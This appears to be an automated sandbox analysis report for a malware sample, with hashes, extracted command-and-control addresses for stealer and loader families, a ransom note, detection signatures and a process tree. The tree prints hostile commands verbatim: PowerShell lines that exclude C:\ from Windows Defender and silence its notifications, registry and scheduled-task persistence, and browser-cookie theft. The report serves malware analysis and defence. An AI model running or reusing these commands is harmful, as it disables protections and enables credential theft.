Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1173s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02-08-2021 17:38

General

  • Target

    8 (2).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CnI3tI6Ktv Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0323gDrgoSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-CnI3tI6Ktv

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

5k_30_SUM

C2

45.14.49.117:14251

Extracted

Family

redline

Botnet

Version 3.02

C2

149.202.65.221:64206

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 39 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 22 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 30 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2664
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2616
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2400
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
              • Modifies registry class
              PID:1944
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1416
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1340
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1256
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1152
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1036
                      • C:\Users\Admin\AppData\Roaming\avevwhb
                        C:\Users\Admin\AppData\Roaming\avevwhb
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:3564
                        • C:\Users\Admin\AppData\Roaming\avevwhb
                          C:\Users\Admin\AppData\Roaming\avevwhb
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4116
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:4248
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          3⤵
                            PID:3636
                            • C:\Windows\SysWOW64\schtasks.exe
                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                              4⤵
                              • Creates scheduled task(s)
                              PID:5508
                        • C:\Users\Admin\AppData\Roaming\irevwhb
                          C:\Users\Admin\AppData\Roaming\irevwhb
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:2104
                        • C:\Users\Admin\AppData\Roaming\ttevwhb
                          C:\Users\Admin\AppData\Roaming\ttevwhb
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5088
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:4644
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            3⤵
                              PID:3880
                          • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                            C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5708
                            • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                              C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                              3⤵
                                PID:2644
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:5156
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:4940
                              • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                                C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:3004
                                • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                                  C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                                  3⤵
                                    PID:3084
                                • \??\c:\windows\system\svchost.exe
                                  c:\windows\system\svchost.exe
                                  2⤵
                                    PID:5568
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                      PID:2740
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:1692
                                      • C:\Users\Admin\AppData\Roaming\avevwhb
                                        C:\Users\Admin\AppData\Roaming\avevwhb
                                        2⤵
                                          PID:5036
                                          • C:\Users\Admin\AppData\Roaming\avevwhb
                                            C:\Users\Admin\AppData\Roaming\avevwhb
                                            3⤵
                                              PID:152
                                          • C:\Users\Admin\AppData\Roaming\irevwhb
                                            C:\Users\Admin\AppData\Roaming\irevwhb
                                            2⤵
                                              PID:3216
                                            • C:\Users\Admin\AppData\Roaming\ttevwhb
                                              C:\Users\Admin\AppData\Roaming\ttevwhb
                                              2⤵
                                                PID:4576
                                              • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                                                C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                                                2⤵
                                                  PID:960
                                                  • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                                                    C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                                                    3⤵
                                                      PID:5400
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                      PID:2104
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:4528
                                                      • \??\c:\windows\system\svchost.exe
                                                        c:\windows\system\svchost.exe
                                                        2⤵
                                                          PID:5916
                                                        • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                                                          C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                                                          2⤵
                                                            PID:6116
                                                            • C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe
                                                              C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11\5AD3.exe --Task
                                                              3⤵
                                                                PID:4572
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              2⤵
                                                                PID:5944
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:5324
                                                                • C:\Users\Admin\AppData\Roaming\ttevwhb
                                                                  C:\Users\Admin\AppData\Roaming\ttevwhb
                                                                  2⤵
                                                                    PID:4328
                                                                  • C:\Users\Admin\AppData\Roaming\avevwhb
                                                                    C:\Users\Admin\AppData\Roaming\avevwhb
                                                                    2⤵
                                                                      PID:4508
                                                                    • C:\Users\Admin\AppData\Roaming\irevwhb
                                                                      C:\Users\Admin\AppData\Roaming\irevwhb
                                                                      2⤵
                                                                        PID:5996
                                                                      • \??\c:\windows\system\svchost.exe
                                                                        c:\windows\system\svchost.exe
                                                                        2⤵
                                                                          PID:4344
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          2⤵
                                                                            PID:5052
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                          1⤵
                                                                            PID:336
                                                                          • C:\Users\Admin\AppData\Local\Temp\8 (2).exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\8 (2).exe"
                                                                            1⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:960
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3044
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\setup_install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\setup_install.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1880
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                  4⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:416
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_3.exe
                                                                                    sonia_3.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    PID:1092
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 904
                                                                                      6⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      • Program crash
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4848
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                                  4⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4084
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_5.exe
                                                                                    sonia_5.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    PID:812
                                                                                    • C:\Users\Admin\Documents\eSvxPUIwumkF1yp9gXCEk8wS.exe
                                                                                      "C:\Users\Admin\Documents\eSvxPUIwumkF1yp9gXCEk8wS.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2448
                                                                                    • C:\Users\Admin\Documents\jG9sAQc043p2UzSf3R7C25Mz.exe
                                                                                      "C:\Users\Admin\Documents\jG9sAQc043p2UzSf3R7C25Mz.exe"
                                                                                      6⤵
                                                                                        PID:3636
                                                                                        • C:\Users\Admin\Documents\jG9sAQc043p2UzSf3R7C25Mz.exe
                                                                                          C:\Users\Admin\Documents\jG9sAQc043p2UzSf3R7C25Mz.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4888
                                                                                      • C:\Users\Admin\Documents\6hUGVld_v2bGo2L2_D6meJvg.exe
                                                                                        "C:\Users\Admin\Documents\6hUGVld_v2bGo2L2_D6meJvg.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:1296
                                                                                        • C:\Users\Admin\Documents\6hUGVld_v2bGo2L2_D6meJvg.exe
                                                                                          C:\Users\Admin\Documents\6hUGVld_v2bGo2L2_D6meJvg.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4104
                                                                                      • C:\Users\Admin\Documents\n2y0dYvzUOmLrChJ5we2bVHn.exe
                                                                                        "C:\Users\Admin\Documents\n2y0dYvzUOmLrChJ5we2bVHn.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5116
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          • Modifies registry class
                                                                                          PID:4420
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4244
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4700
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                            PID:4080
                                                                                        • C:\Users\Admin\Documents\eJEhs7WuC10ych32tu7NnWUC.exe
                                                                                          "C:\Users\Admin\Documents\eJEhs7WuC10ych32tu7NnWUC.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5100
                                                                                          • C:\Users\Admin\Documents\eJEhs7WuC10ych32tu7NnWUC.exe
                                                                                            "C:\Users\Admin\Documents\eJEhs7WuC10ych32tu7NnWUC.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4304
                                                                                        • C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                          "C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5088
                                                                                          • C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                            C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:5016
                                                                                          • C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                            C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                            7⤵
                                                                                              PID:4444
                                                                                            • C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                              C:\Users\Admin\Documents\6LdbGm6zHtPtXLDJ_VDLCCiH.exe
                                                                                              7⤵
                                                                                                PID:4736
                                                                                            • C:\Users\Admin\Documents\3gIxHBLOii6AQ5oqt7Vt3oeh.exe
                                                                                              "C:\Users\Admin\Documents\3gIxHBLOii6AQ5oqt7Vt3oeh.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5072
                                                                                            • C:\Users\Admin\Documents\XBUdABtxImaHTpo8z8jgPnJI.exe
                                                                                              "C:\Users\Admin\Documents\XBUdABtxImaHTpo8z8jgPnJI.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:4928
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\XBUdABtxImaHTpo8z8jgPnJI.exe"
                                                                                                7⤵
                                                                                                  PID:5656
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /T 10 /NOBREAK
                                                                                                    8⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Delays execution with timeout.exe
                                                                                                    • Modifies registry class
                                                                                                    PID:5988
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RedjzUKiTi.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RedjzUKiTi.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5420
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell" Set-MpPreference -PUAProtection 1
                                                                                                    8⤵
                                                                                                      PID:6008
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6032
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate' -Value '"C:\Users\Admin\AppData\Local\Temp\AutoWindowsUpdate\win32update.exe"' -PropertyType 'String'
                                                                                                      8⤵
                                                                                                      • Adds Run key to start application
                                                                                                      PID:6096
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
                                                                                                      8⤵
                                                                                                        PID:5996
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell" Add-MpPreference -ExclusionPath C:\
                                                                                                        8⤵
                                                                                                          PID:5956
                                                                                                    • C:\Users\Admin\Documents\zc2aH1pztMP0RhsQn853RJev.exe
                                                                                                      "C:\Users\Admin\Documents\zc2aH1pztMP0RhsQn853RJev.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4636
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-U3UIU.tmp\zc2aH1pztMP0RhsQn853RJev.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-U3UIU.tmp\zc2aH1pztMP0RhsQn853RJev.tmp" /SL5="$201F6,138429,56832,C:\Users\Admin\Documents\zc2aH1pztMP0RhsQn853RJev.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:4860
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-P4P53.tmp\Setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-P4P53.tmp\Setup.exe" /Verysilent
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:4080
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                            9⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4904
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              10⤵
                                                                                                                PID:6032
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                10⤵
                                                                                                                  PID:6064
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  10⤵
                                                                                                                    PID:4508
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    10⤵
                                                                                                                      PID:5652
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                    9⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4592
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                      10⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5740
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                    9⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:5188
